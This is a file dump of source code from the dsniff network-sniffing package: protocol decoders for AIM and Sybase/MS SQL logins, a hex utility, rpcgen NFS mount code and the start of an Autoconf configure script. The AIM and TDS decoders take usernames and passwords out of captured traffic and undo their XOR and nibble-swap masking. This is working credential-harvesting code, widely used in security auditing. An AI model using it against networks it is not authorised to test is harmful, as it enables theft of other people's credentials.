&pass) != 0) break; snprintf(obuf, olen, "%s %s\n", u, pass); break; } if (need_more > 0) { need_more--; strlcat(obuf, p, olen); if (need_more > 0) continue; strlcat(obuf, "\n", olen); break; } break; } if (obuf[0] == '\0') return 0; dc_meta.is_hot = 1; return (strlen(obuf)); } hackerschoice-dsniff-a17510d/decode_aim.c0000664000175000017500000000421115105626144020225 0ustar epsilonepsilon/* * decode_aim.c * * AOL Instant Messenger (and ICQ2000). * * Copyright (c) 2000 Dug Song * * $Id: decode_aim.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "hex.h" #include "buf.h" #include "decode.h" struct flap { u_char start; u_char channel; u_short seqnum; u_short datalen; }; static char *aim_xor1 = "Tic/Toc"; static u_char aim_xor2[] = { 0xf3, 0x26, 0x81, 0xc4, 0x39, 0x86, 0xdb, 0x92, 0x71, 0xa3, 0xb9, 0xe6, 0x53, 0x7a, 0x95, 0x7c }; int decode_aim(u_char *buf, int len, u_char *obuf, int olen) { struct buf *msg, inbuf, outbuf; struct flap *flap; u_char c, *p; int i, j; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (buf_cmp(&inbuf, "FLAPON\r\n\r\n", 10) == 0) buf_skip(&inbuf, 10); while (buf_len(&inbuf) > sizeof(*flap)) { flap = (struct flap *)buf_ptr(&inbuf); flap->datalen = ntohs(flap->datalen); i = sizeof(*flap) + flap->datalen; if ((msg = buf_tok(&inbuf, NULL, i)) == NULL) break; buf_skip(msg, sizeof(*flap)); if (buf_cmp(msg, "toc_signon ", 11) == 0) { msg->base[msg->end - 1] = '\0'; p = buf_ptr(msg); for (i = 0; i < 4; i++) { if ((j = strcspn(p, " ")) > 0) p += (j + 1); } if (strtok(p, " ") == NULL) continue; buf_putf(&outbuf, "%s ", buf_ptr(msg)); i = strlen(p); j = hex_decode(p, i, p, i); for (i = 0; i < j; i++) p[i] = p[i] ^ aim_xor1[i % 7]; p[i] = '\0'; buf_putf(&outbuf, "[%s]\n", p); } else if (flap->start == 0x2a && flap->channel == 0x01 && buf_cmp(msg, "\x00\x00\x00\x01", 4) == 0) { buf_skip(msg, 7); buf_get(msg, &c, 1); p = buf_ptr(msg); if (c == 0 || buf_skip(msg, c + 3) < 0) continue; p[c] = '\0'; buf_get(msg, &c, 1); if (buf_len(msg) < c + 1) continue; buf_putf(&outbuf, "%s\n", p); p = buf_ptr(msg); for (i = 0; i < c; i++) { p[i] = p[i] ^ aim_xor2[i % sizeof(aim_xor2)]; } p[i] = '\0'; buf_putf(&outbuf, "%s\n", p); break; } } buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/hex.c0000664000175000017500000000275115105626144016747 0ustar epsilonepsilon/* * hex.c * * Copyright (c) 2000 Dug Song * * $Id: hex.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "hex.h" int hex_decode(char *src, int srclen, u_char *dst, int dstlen) { char *p, *pe; u_char *q, *qe, ch, cl; pe = src + srclen; qe = dst + dstlen; if (strncmp(src, "0x", 2) == 0) src += 2; for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) { ch = tolower(p[0]); cl = tolower(p[1]); if ((ch >= '0') && (ch <= '9')) ch -= '0'; else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10; else return (-1); if ((cl >= '0') && (cl <= '9')) cl -= '0'; else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10; else return (-1); *q++ = (ch << 4) | cl; } return (q - dst); } /* adapted from OpenBSD tcpdump: dump the buffer in emacs-hexl format */ void hex_print(const u_char *buf, int len, int offset) { u_int i, j, jm; int c; printf("\n"); for (i = 0; i < len; i += 0x10) { printf(" %04x: ", (u_int)(i + offset)); jm = len - i; jm = jm > 16 ? 16 : jm; for (j = 0; j < jm; j++) { if ((j % 2) == 1) printf("%02x ", (u_int) buf[i+j]); else printf("%02x", (u_int) buf[i+j]); } for (; j < 16; j++) { if ((j % 2) == 1) printf(" "); else printf(" "); } printf(" "); for (j = 0; j < jm; j++) { c = buf[i+j]; c = isprint(c) ? c : '.'; printf("%c", c); } printf("\n"); } } hackerschoice-dsniff-a17510d/mount.c0000664000175000017500000000331415105626144017321 0ustar epsilonepsilon/* * Please do not edit this file. * It was generated using rpcgen. */ #include "mount.h" bool_t xdr_fhandle (XDR *xdrs, fhandle objp) { register int32_t *buf; if (!xdr_opaque (xdrs, objp, FHSIZE)) return FALSE; return TRUE; } bool_t xdr_fhandle3 (XDR *xdrs, fhandle3 *objp) { register int32_t *buf; if (!xdr_bytes (xdrs, (char **)&objp->fhandle3_val, (u_int *) &objp->fhandle3_len, FHSIZE3)) return FALSE; return TRUE; } bool_t xdr_fhstatus (XDR *xdrs, fhstatus *objp) { register int32_t *buf; if (!xdr_u_int (xdrs, &objp->fhs_status)) return FALSE; switch (objp->fhs_status) { case 0: if (!xdr_fhandle (xdrs, objp->fhstatus_u.fhs_fhandle)) return FALSE; break; default: break; } return TRUE; } #define fhs_fh fhstatus_u.fhs_fhandle bool_t xdr_mountstat3 (XDR *xdrs, mountstat3 *objp) { register int32_t *buf; if (!xdr_enum (xdrs, (enum_t *) objp)) return FALSE; return TRUE; } bool_t xdr_mountres3_ok (XDR *xdrs, mountres3_ok *objp) { register int32_t *buf; if (!xdr_fhandle3 (xdrs, &objp->fhandle)) return FALSE; if (!xdr_array (xdrs, (char **)&objp->auth_flavors.auth_flavors_val, (u_int *) &objp->auth_flavors.auth_flavors_len, ~0, sizeof (int), (xdrproc_t) xdr_int)) return FALSE; return TRUE; } bool_t xdr_mountres3 (XDR *xdrs, mountres3 *objp) { register int32_t *buf; if (!xdr_mountstat3 (xdrs, &objp->fhs_status)) return FALSE; switch (objp->fhs_status) { case MNT_OK: if (!xdr_mountres3_ok (xdrs, &objp->mountres3_u.mountinfo)) return FALSE; break; default: break; } return TRUE; } bool_t xdr_dirpath (XDR *xdrs, dirpath *objp) { register int32_t *buf; if (!xdr_string (xdrs, objp, MNTPATHLEN)) return FALSE; return TRUE; } hackerschoice-dsniff-a17510d/decode_tds.c0000664000175000017500000001017615105626144020260 0ustar epsilonepsilon/* * decode_tds.c * * Tabular Data Stream (Sybase, Microsoft SQL). See www.freetds.org. * * Thanks to antilove!@#$% and Ben Lowery for * providing me with packet traces. * * Copyright (c) 2000 Dug Song * Copyright (c) 2001 Paul van Maaren * * $Id: decode_tds.c,v 1.10 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "decode.h" struct tds_hdr { u_char type; u_char last; u_short size; u_int32_t zero; }; struct tds_login { char hostname[30]; u_char hostlen; char username[30]; u_char userlen; char password[30]; u_char passlen; char process[30]; u_char proclen; char magic1[6]; u_char bulkcopy; char magic2[9]; char appname[30]; u_char applen; char servername[30]; u_char serverlen; u_char zero; u_char pass2len; char password2[30]; char magic3[223]; u_char pass2len2; char version[4]; char libname[10]; u_char liblen; char magic4[3]; char language[30]; u_char langlen; u_char nolang; u_short magic5; u_char encrypted; char magic6[10]; char charset[30]; u_char charlen; u_char magic7; char blocksize[6]; u_char blocklen; char magic8[4]; /* 4.2: 8, 4.6: 4, 5.0: 25 */ }; u_char tds7_magic1[] = { 0x6, 0x83, 0xf2, 0xf8, 0xff, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x03, 0x0, 0x0, 0x88, 0xff, 0xff, 0xff, 0x36, 0x04, 0x00, 0x00 }; struct tds7_login { u_short size; char zero1[5]; u_char byte1; /* 0x70 */ char zero2[7]; char magic1[21]; u_short servpos; u_short servlen; u_short userpos; /* XXX - freetds got this wrong? */ u_short userlen; u_short passpos; u_short passlen; u_short somepos; u_short somelen; u_short apppos; u_short applen; char zero4[4]; u_short libpos; u_short liblen; char skip1[8]; char magic2[6]; char skip2[8]; /* char servername[servlen]; */ /* char username[userlen]; */ /* char password[passlen]; */ /* char appname[applen]; */ /* char server[servlen]; */ /* char library[liblen]; */ /* char magic3[48]; */ }; static void deunicode(u_char *buf, int len) { int i; for (i = 0; i < len; i++) { buf[i] = buf[i * 2]; } buf[i] = '\0'; } static void tds7_decrypt(u_char *buf, int len) { int i; for (i = 0; i < len; i++) { buf[i] = ((buf[i] << 4) | (buf[i] >> 4)) ^ 0x5a; } buf[i] = '\0'; } int decode_tds(u_char *buf, int len, u_char *obuf, int olen) { struct tds_hdr *th; struct tds_login *tl; struct tds7_login *t7l, *myt7l; u_char *user, *pass, *serv; u_short userlen, passlen, servlen; obuf[0] = '\0'; for (th = (struct tds_hdr *)buf; len > sizeof(*th) && len >= ntohs(th->size); buf += ntohs(th->size), len -= ntohs(th->size)) { if (th->size != 8) { /* wrong header length */ break; } if (th->type == 2) { /* Version 4.x, 5.0 */ if (len < sizeof(*th) + sizeof(*tl)) return (0); tl = (struct tds_login *)(th + 1); if (tl->userlen > sizeof(tl->username)) return (0); tl->username[tl->userlen] = '\0'; strlcat(obuf, tl->username, olen); strlcat(obuf, "\n", olen); if (tl->passlen > sizeof(tl->password)) return (0); tl->password[tl->passlen] = '\0'; strlcat(obuf, tl->password, olen); strlcat(obuf, "\n", olen); } else if (th->type == 16 && th->last == 1) { /* Version 7.0 */ if (len < sizeof(*th) + sizeof(*t7l)) return (0); t7l = (struct tds7_login *)(th + 1); myt7l = (struct tds7_login *)(buf + sizeof(*th)); userlen = pletohs(&t7l->userlen); passlen = pletohs(&t7l->passlen); servlen = pletohs(&t7l->servlen); if (len < sizeof(*th) + sizeof(*t7l) + (2 * (userlen + passlen))) { return (0); } serv = (u_char *)(t7l + 1); deunicode(serv, servlen); user = serv + (2 * servlen); pass = user + (2 * userlen); deunicode(user, userlen); /* XXX - when to call? */ tds7_decrypt(pass, 2 * passlen); deunicode(pass, passlen); snprintf(obuf + strlen(obuf), olen - strlen(obuf), "%s\n%s\n", user, pass); return(strlen(obuf)); } } return (strlen(obuf)); } hackerschoice-dsniff-a17510d/configure0000775000175000017500000064415215105626144017735 0ustar epsilonepsilon#! /bin/sh # Guess values for system-dependent variables and create Makefiles. # Generated by GNU Autoconf 2.72. # # # Copyright (C) 1992-1996, 1998-2017, 2020-2023 Free Software Foundation, # Inc. # # # This configure script is free software; the Free Software Foundation # gives unlimited permission to copy, distribute and modify it. ## -------------------- ## ## M4sh Initialization. ## ## -------------------- ## # Be more Bourne compatible DUALCASE=1; export DUALCASE # for MKS sh if test ${ZSH_VERSION+y} && (emulate sh) >/dev/null 2>&1 then : emulate sh NULLCMD=: # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which # is contrary to our usage. Disable this feature. alias -g '${1+"$@"}'='"$@"' setopt NO_GLOB_SUBST else case e in #( e) case `(set -o) 2>/dev/null` in #( *posix*) : set -o posix ;; #( *) : ;; esac ;; esac fi # Reset variables that may have inherited troublesome values from # the environment. # IFS needs to be set, to space, tab, and newline, in precisely that order. # (If _AS_PATH_WALK were called with IFS unset, it would have the # side effect of setting IFS to empty, thus disabling word splitting.) # Quoting is to prevent editors from complaining about space-tab. as_nl=' ' export as_nl IFS=" "" $as_nl" PS1='$ ' PS2='> ' PS4='+ ' # Ensure predictable behavior from utilities with locale-dependent output. LC_ALL=C export LC_ALL LANGUAGE=C export LANGUAGE # We cannot yet rely on "unset" to work, but we need these variables # to be unset--not just set to an empty or harmless value--now, to # avoid bugs in old shells (e.g. pre-3.0 UWIN ksh). This construct # also avoids known problems related to "unset" and subshell syntax # in other old shells (e.g. bash 2.01 and pdksh 5.2.14). for as_var in BASH_ENV ENV MAIL MAILPATH CDPATH do eval test \${$as_var+y} \ && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : done # Ensure that fds 0, 1, and 2 are open. if (exec 3>&0) 2>/dev/null; then :; else exec 0&1) 2>/dev/null; then :; else exec 1>/dev/null; fi if (exec 3>&2) ; then :; else exec 2>/dev/null; fi # The user is always right. if ${PATH_SEPARATOR+false} :; then PATH_SEPARATOR=: (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || PATH_SEPARATOR=';' } fi # Find who we are. Look in the path if we contain no directory separator. as_myself= case $0 in #(( *[\\/]* ) as_myself=$0 ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac test -r "$as_dir$0" && as_myself=$as_dir$0 && break done IFS=$as_save_IFS ;; esac # We did not find ourselves, most probably we were run as 'sh COMMAND' # in which case we are not to be found in the path. if test "x$as_myself" = x; then as_myself=$0 fi if test ! -f "$as_myself"; then printf "%s\n" "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 exit 1 fi # Use a proper internal environment variable to ensure we don't fall # into an infinite loop, continuously re-executing ourselves. if test x"${_as_can_reexec}" != xno && test "x$CONFIG_SHELL" != x; then _as_can_reexec=no; export _as_can_reexec; # We cannot yet assume a decent shell, so we have to provide a # neutralization value for shells without unset; and this also # works around shells that cannot unset nonexistent variables. # Preserve -v and -x to the replacement shell. BASH_ENV=/dev/null ENV=/dev/null (unset BASH_ENV) >/dev/null 2>&1 && unset BASH_ENV ENV case $- in # (((( *v*x* | *x*v* ) as_opts=-vx ;; *v* ) as_opts=-v ;; *x* ) as_opts=-x ;; * ) as_opts= ;; esac exec $CONFIG_SHELL $as_opts "$as_myself" ${1+"$@"} # Admittedly, this is quite paranoid, since all the known shells bail # out after a failed 'exec'. printf "%s\n" "$0: could not re-execute with $CONFIG_SHELL" >&2 exit 255 fi # We don't want this to propagate to other subprocesses. { _as_can_reexec=; unset _as_can_reexec;} if test "x$CONFIG_SHELL" = x; then as_bourne_compatible="if test \${ZSH_VERSION+y} && (emulate sh) >/dev/null 2>&1 then : emulate sh NULLCMD=: # Pre-4.2 versions of Zsh do word splitting on \${1+\"\$@\"}, which # is contrary to our usage. Disable this feature. alias -g '\${1+\"\$@\"}'='\"\$@\"' setopt NO_GLOB_SUBST else case e in #( e) case \`(set -o) 2>/dev/null\` in #( *posix*) : set -o posix ;; #( *) : ;; esac ;; esac fi " as_required="as_fn_return () { (exit \$1); } as_fn_success () { as_fn_return 0; } as_fn_failure () { as_fn_return 1; } as_fn_ret_success () { return 0; } as_fn_ret_failure () { return 1; } exitcode=0 as_fn_success || { exitcode=1; echo as_fn_success failed.; } as_fn_failure && { exitcode=1; echo as_fn_failure succeeded.; } as_fn_ret_success || { exitcode=1; echo as_fn_ret_success failed.; } as_fn_ret_failure && { exitcode=1; echo as_fn_ret_failure succeeded.; } if ( set x; as_fn_ret_success y && test x = \"\$1\" ) then : else case e in #( e) exitcode=1; echo positional parameters were not saved. ;; esac fi test x\$exitcode = x0 || exit 1 blah=\$(echo \$(echo blah)) test x\"\$blah\" = xblah || exit 1 test -x / || exit 1" as_suggested=" as_lineno_1=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_1a=\$LINENO as_lineno_2=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_2a=\$LINENO eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" && test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1 test \$(( 1 + 1 )) = 2 || exit 1" if (eval "$as_required") 2>/dev/null then : as_have_required=yes else case e in #( e) as_have_required=no ;; esac fi if test x$as_have_required = xyes && (eval "$as_suggested") 2>/dev/null then : else case e in #( e) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR as_found=false for as_dir in /bin$PATH_SEPARATOR/usr/bin$PATH_SEPARATOR$PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac as_found=: case $as_dir in #( /*) for as_base in sh bash ksh sh5; do # Try only shells that exist, to save several forks. as_shell=$as_dir$as_base if { test -f "$as_shell" || test -f "$as_shell.exe"; } && as_run=a "$as_shell" -c "$as_bourne_compatible""$as_required" 2>/dev/null then : CONFIG_SHELL=$as_shell as_have_required=yes if as_run=a "$as_shell" -c "$as_bourne_compatible""$as_suggested" 2>/dev/null then : break 2 fi fi done;; esac as_found=false done IFS=$as_save_IFS if $as_found then : else case e in #( e) if { test -f "$SHELL" || test -f "$SHELL.exe"; } && as_run=a "$SHELL" -c "$as_bourne_compatible""$as_required" 2>/dev/null then : CONFIG_SHELL=$SHELL as_have_required=yes fi ;; esac fi if test "x$CONFIG_SHELL" != x then : export CONFIG_SHELL # We cannot yet assume a decent shell, so we have to provide a # neutralization value for shells without unset; and this also # works around shells that cannot unset nonexistent variables. # Preserve -v and -x to the replacement shell. BASH_ENV=/dev/null ENV=/dev/null (unset BASH_ENV) >/dev/null 2>&1 && unset BASH_ENV ENV case $- in # (((( *v*x* | *x*v* ) as_opts=-vx ;; *v* ) as_opts=-v ;; *x* ) as_opts=-x ;; * ) as_opts= ;; esac exec $CONFIG_SHELL $as_opts "$as_myself" ${1+"$@"} # Admittedly, this is quite paranoid, since all the known shells bail # out after a failed 'exec'. printf "%s\n" "$0: could not re-execute with $CONFIG_SHELL" >&2 exit 255 fi if test x$as_have_required = xno then : printf "%s\n" "$0: This script requires a shell more modern than all" printf "%s\n" "$0: the shells that I found on your system." if test ${ZSH_VERSION+y} ; then printf "%s\n" "$0: In particular, zsh $ZSH_VERSION has bugs and should" printf "%s\n" "$0: be upgraded to zsh 4.3.4 or later." else printf "%s\n" "$0: Please tell bug-autoconf@gnu.org about your system, $0: including any error possibly output before this $0: message. Then install a modern shell, or manually run $0: the script under such a shell if you do have one." fi exit 1 fi ;; esac fi fi SHELL=${CONFIG_SHELL-/bin/sh} export SHELL # Unset more variables known to interfere with behavior of common tools. CLICOLOR_FORCE= GREP_OPTIONS= unset CLICOLOR_FORCE GREP_OPTIONS ## --------------------- ## ## M4sh Shell Functions. ## ## --------------------- ## # as_fn_unset VAR # --------------- # Portably unset VAR. as_fn_unset () { { eval $1=; unset $1;} } as_unset=as_fn_unset # as_fn_set_status STATUS # ----------------------- # Set $? to STATUS, without forking. as_fn_set_status () { return $1 } # as_fn_set_status # as_fn_exit STATUS # ----------------- # Exit the shell with STATUS, even in a "trap 0" or "set -e" context. as_fn_exit () { set +e as_fn_set_status $1 exit $1 } # as_fn_exit # as_fn_mkdir_p # ------------- # Create "$as_dir" as a directory, including parents if necessary. as_fn_mkdir_p () { case $as_dir in #( -*) as_dir=./$as_dir;; esac test -d "$as_dir" || eval $as_mkdir_p || { as_dirs= while :; do case $as_dir in #( *\'*) as_qdir=`printf "%s\n" "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( *) as_qdir=$as_dir;; esac as_dirs="'$as_qdir' $as_dirs" as_dir=`$as_dirname -- "$as_dir" || $as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$as_dir" : 'X\(//\)[^/]' \| \ X"$as_dir" : 'X\(//\)$' \| \ X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || printf "%s\n" X"$as_dir" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'` test -d "$as_dir" && break done test -z "$as_dirs" || eval "mkdir $as_dirs" } || test -d "$as_dir" || as_fn_error $? "cannot create directory $as_dir" } # as_fn_mkdir_p # as_fn_executable_p FILE # ----------------------- # Test if FILE is an executable regular file. as_fn_executable_p () { test -f "$1" && test -x "$1" } # as_fn_executable_p # as_fn_append VAR VALUE # ---------------------- # Append the text in VALUE to the end of the definition contained in VAR. Take # advantage of any shell optimizations that allow amortized linear growth over # repeated appends, instead of the typical quadratic growth present in naive # implementations. if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null then : eval 'as_fn_append () { eval $1+=\$2 }' else case e in #( e) as_fn_append () { eval $1=\$$1\$2 } ;; esac fi # as_fn_append # as_fn_arith ARG... # ------------------ # Perform arithmetic evaluation on the ARGs, and store the result in the # global $as_val. Take advantage of shells that can avoid forks. The arguments # must be portable across $(()) and expr. if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null then : eval 'as_fn_arith () { as_val=$(( $* )) }' else case e in #( e) as_fn_arith () { as_val=`expr "$@" || test $? -eq 1` } ;; esac fi # as_fn_arith # as_fn_error STATUS ERROR [LINENO LOG_FD] # ---------------------------------------- # Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are # provided, also output the error to LOG_FD, referencing LINENO. Then exit the # script with STATUS, using 1 if that was 0. as_fn_error () { as_status=$1; test $as_status -eq 0 && as_status=1 if test "$4"; then as_lineno=${as_lineno-"$3"} as_lineno_stack=as_lineno_stack=$as_lineno_stack printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: $2" >&$4 fi printf "%s\n" "$as_me: error: $2" >&2 as_fn_exit $as_status } # as_fn_error if expr a : '\(a\)' >/dev/null 2>&1 && test "X`expr 00001 : '.*\(...\)'`" = X001; then as_expr=expr else as_expr=false fi if (basename -- /) >/dev/null 2>&1 && test "X`basename -- / 2>&1`" = "X/"; then as_basename=basename else as_basename=false fi if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then as_dirname=dirname else as_dirname=false fi as_me=`$as_basename -- "$0" || $as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ X"$0" : 'X\(//\)$' \| \ X"$0" : 'X\(/\)' \| . 2>/dev/null || printf "%s\n" X/"$0" | sed '/^.*\/\([^/][^/]*\)\/*$/{ s//\1/ q } /^X\/\(\/\/\)$/{ s//\1/ q } /^X\/\(\/\).*/{ s//\1/ q } s/.*/./; q'` # Avoid depending upon Character Ranges. as_cr_letters='abcdefghijklmnopqrstuvwxyz' as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' as_cr_Letters=$as_cr_letters$as_cr_LETTERS as_cr_digits='0123456789' as_cr_alnum=$as_cr_Letters$as_cr_digits as_lineno_1=$LINENO as_lineno_1a=$LINENO as_lineno_2=$LINENO as_lineno_2a=$LINENO eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" && test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || { # Blame Lee E. McMahon (1931-1989) for sed's syntax. :-) sed -n ' p /[$]LINENO/= ' <$as_myself | sed ' t clear :clear s/[$]LINENO.*/&-/ t lineno b :lineno N :loop s/[$]LINENO\([^'$as_cr_alnum'_].*\n\)\(.*\)/\2\1\2/ t loop s/-\n.*// ' >$as_me.lineno && chmod +x "$as_me.lineno" || { printf "%s\n" "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2; as_fn_exit 1; } # If we had to re-execute with $CONFIG_SHELL, we're ensured to have # already done that, so ensure we don't try to do so again and fall # in an infinite loop. This has already happened in practice. _as_can_reexec=no; export _as_can_reexec # Don't try to exec as it changes $[0], causing all sort of problems # (the dirname of $[0] is not the place where we might find the # original and so on. Autoconf is especially sensitive to this). . "./$as_me.lineno" # Exit status is that of the last command. exit } # Determine whether it's possible to make 'echo' print without a newline. # These variables are no longer used directly by Autoconf, but are AC_SUBSTed # for compatibility with existing Makefiles. ECHO_C= ECHO_N= ECHO_T= case `echo -n x` in #((((( -n*) case `echo 'xy\c'` in *c*) ECHO_T=' ';; # ECHO_T is single tab character. xy) ECHO_C='\c';; *) echo `echo ksh88 bug on AIX 6.1` > /dev/null ECHO_T=' ';; esac;; *) ECHO_N='-n';; esac # For backward compatibility with old third-party macros, we provide # the shell variables $as_echo and $as_echo_n. New code should use # AS_ECHO(["message"]) and AS_ECHO_N(["message"]), respectively. as_echo='printf %s\n' as_echo_n='printf %s' rm -f conf$$ conf$$.exe conf$$.file if test -d conf$$.dir; then rm -f conf$$.dir/conf$$.file else rm -f conf$$.dir mkdir conf$$.dir 2>/dev/null fi if (echo >conf$$.file) 2>/dev/null; then if ln -s conf$$.file conf$$ 2>/dev/null; then as_ln_s='ln -s' # ... but there are two gotchas: # 1) On MSYS, both 'ln -s file dir' and 'ln file dir' fail. # 2) DJGPP < 2.04 has no symlinks; 'ln -s' creates a wrapper executable. # In both cases, we have to default to 'cp -pR'. ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || as_ln_s='cp -pR' elif ln conf$$.file conf$$ 2>/dev/null; then as_ln_s=ln else as_ln_s='cp -pR' fi else as_ln_s='cp -pR' fi rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file rmdir conf$$.dir 2>/dev/null if mkdir -p . 2>/dev/null; then as_mkdir_p='mkdir -p "$as_dir"' else test -d ./-p && rmdir ./-p as_mkdir_p=false fi as_test_x='test -x' as_executable_p=as_fn_executable_p # Sed expression to map a string onto a valid CPP name. as_sed_cpp="y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g" as_tr_cpp="eval sed '$as_sed_cpp'" # deprecated # Sed expression to map a string onto a valid variable name. as_sed_sh="y%*+%pp%;s%[^_$as_cr_alnum]%_%g" as_tr_sh="eval sed '$as_sed_sh'" # deprecated test -n "$DJDIR" || exec 7<&0 &1 # Name of the host. # hostname on some systems (SVR3.2, old GNU/Linux) returns a bogus exit status, # so uname gets run too. ac_hostname=`(hostname || uname -n) 2>/dev/null | sed 1q` # # Initializations. # ac_default_prefix=/usr/local ac_clean_files= ac_config_libobj_dir=. LIBOBJS= cross_compiling=no subdirs= MFLAGS= MAKEFLAGS= # Identity of this package. PACKAGE_NAME='' PACKAGE_TARNAME='' PACKAGE_VERSION='' PACKAGE_STRING='' PACKAGE_BUGREPORT='' PACKAGE_URL='' ac_unique_file="dsniff.c" # Factoring default headers for most tests. ac_includes_default="\ #include #ifdef HAVE_STDIO_H # include #endif #ifdef HAVE_STDLIB_H # include #endif #ifdef HAVE_STRING_H # include #endif #ifdef HAVE_INTTYPES_H # include #endif #ifdef HAVE_STDINT_H # include #endif #ifdef HAVE_STRINGS_H # include #endif #ifdef HAVE_SYS_TYPES_H # include #endif #ifdef HAVE_SYS_STAT_H # include #endif #ifdef HAVE_UNISTD_H # include #endif" ac_header_c_list= ac_subst_vars='LTLIBOBJS SSLLIB SSLINC NIDSLIB NIDSINC LNETLIB LNETINC PCAPLIB PCAPINC LDFLAGS_STATIC DBLIB DBINC WEBSPY TCPHIJACK X_IBVERBS_LIB X_TIRPC_LIB LIBOBJS X_EXTRA_LIBS X_LIBS X_PRE_LIBS X_CFLAGS CPP XMKMF RANLIB INSTALL_DATA INSTALL_SCRIPT INSTALL_PROGRAM OBJEXT EXEEXT ac_ct_CC CPPFLAGS LDFLAGS CFLAGS CC target_alias host_alias build_alias LIBS ECHO_T ECHO_N ECHO_C DEFS mandir localedir libdir psdir pdfdir dvidir htmldir infodir docdir oldincludedir includedir runstatedir localstatedir sharedstatedir sysconfdir datadir datarootdir libexecdir sbindir bindir program_transform_name prefix exec_prefix PACKAGE_URL PACKAGE_BUGREPORT PACKAGE_STRING PACKAGE_VERSION PACKAGE_TARNAME PACKAGE_NAME PATH_SEPARATOR SHELL' ac_subst_files='' ac_user_opts=' enable_option_checking with_x enable_static enable_berkeleydb with_db with_libpcap with_libnet with_libnids with_openssl ' ac_precious_vars='build_alias host_alias target_alias CC CFLAGS LDFLAGS LIBS CPPFLAGS XMKMF CPP' # Initialize some variables set by options. ac_init_help= ac_init_version=false ac_unrecognized_opts= ac_unrecognized_sep= # The variables have the same names as the options, with # dashes changed to underlines. cache_file=/dev/null exec_prefix=NONE no_create= no_recursion= prefix=NONE program_prefix=NONE program_suffix=NONE program_transform_name=s,x,x, silent= site= srcdir= verbose= x_includes=NONE x_libraries=NONE # Installation directory options. # These are left unexpanded so users can "make install exec_prefix=/foo" # and all the variables that are supposed to be based on exec_prefix # by default will actually change. # Use braces instead of parens because sh, perl, etc. also accept them. # (The list follows the same order as the GNU Coding Standards.) bindir='${exec_prefix}/bin' sbindir='${exec_prefix}/sbin' libexecdir='${exec_prefix}/libexec' datarootdir='${prefix}/share' datadir='${datarootdir}' sysconfdir='${prefix}/etc' sharedstatedir='${prefix}/com' localstatedir='${prefix}/var' runstatedir='${localstatedir}/run' includedir='${prefix}/include' oldincludedir='/usr/include' docdir='${datarootdir}/doc/${PACKAGE}' infodir='${datarootdir}/info' htmldir='${docdir}' dvidir='${docdir}' pdfdir='${docdir}' psdir='${docdir}' libdir='${exec_prefix}/lib' localedir='${datarootdir}/locale' mandir='${datarootdir}/man' ac_prev= ac_dashdash= for ac_option do # If the previous option needs an argument, assign it. if test -n "$ac_prev"; then eval $ac_prev=\$ac_option ac_prev= continue fi case $ac_option in *=?*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;; *=) ac_optarg= ;; *) ac_optarg=yes ;; esac case $ac_dashdash$ac_option in --) ac_dashdash=yes ;; -bindir | --bindir | --bindi | --bind | --bin | --bi) ac_prev=bindir ;; -bindir=* | --bindir=* | --bindi=* | --bind=* | --bin=* | --bi=*) bindir=$ac_optarg ;; -build | --build | --buil | --bui | --bu) ac_prev=build_alias ;; -build=* | --build=* | --buil=* | --bui=* | --bu=*) build_alias=$ac_optarg ;; -cache-file | --cache-file | --cache-fil | --cache-fi \ | --cache-f | --cache- | --cache | --cach | --cac | --ca | --c) ac_prev=cache_file ;; -cache-file=* | --cache-file=* | --cache-fil=* | --cache-fi=* \ | --cache-f=* | --cache-=* | --cache=* | --cach=* | --cac=* | --ca=* | --c=*) cache_file=$ac_optarg ;; --config-cache | -C) 